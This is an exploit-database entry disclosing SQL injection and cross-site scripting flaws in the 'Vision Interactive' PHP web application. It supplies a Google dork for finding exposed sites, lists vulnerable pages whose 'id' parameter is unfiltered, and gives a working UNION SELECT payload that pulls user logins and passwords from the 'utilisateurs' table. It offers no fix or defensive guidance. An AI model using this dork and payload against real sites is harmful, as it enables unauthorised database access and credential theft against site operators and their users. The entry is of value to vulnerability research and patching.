Vision Interactive - SQL Injection / Cross-Site Scripting Vulnerabilities

ID 1337DAY-ID-21867
Type zdt
Reporter X-Line
Modified 2014-02-07T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: Vision Interactive - SQL Injection and Cross-Site Scripting 
# Google Dork: "Powered by Vision Interactive"
# Date: 04/02/2014
# ontact: FB /7h38357
# Exploit Author: X-Line ( Empire North )
# Vendor Homepage:
# Software Link:
# Tested on: Windows, Linux
Vulnerable code infile fiche.php produits.php apeldetail.php *.php
Description: The $_GET-Parameter 'id' is not filtered and so an attacker
             can inject some malicious mysql-code.

    SQL Injection & Cross-Site Scripting

http://localhost/fiche.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/produits.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/apeldetail.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/fiche_actualite.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/reservation.php?id=[SQL INJECTION] and [Cross-Site Scripting]


Demo: union select 1,2,3,4,5,6,7,group_concat(us_login,0x3a,us_pass),9,10,11,12,13,14 from utilisateurs

#Greetz to lWalida & Walid & Myself

# [2018-01-05]  #